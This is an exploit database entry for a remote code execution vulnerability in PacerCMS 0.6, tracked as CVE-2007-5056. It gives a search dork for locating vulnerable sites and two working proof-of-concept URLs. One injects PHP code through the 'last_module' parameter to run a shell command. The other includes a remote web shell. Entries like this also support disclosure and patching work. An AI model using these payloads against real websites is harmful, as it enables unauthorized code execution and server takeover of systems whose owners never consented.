EXPLOITS

PacerCMS 0.6 - 'last_module' Remote Code Execution

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-02-09  
date_updated: 2016-11-10  
verified: 1  
codes: OSVDB-40596;CVE-2007-5056  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5098.txt  

### PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability
### Script : http://ovh.dl.sourceforge.net/sourceforge/pacercms/pacercms0.6.zip
### Dork : Powered by PacerCMS
### POC :
###     /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###     OR INCLUDE SHELL
###     /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
###  I'm TrYaGi ......:)

# milw0rm.com [2008-02-10]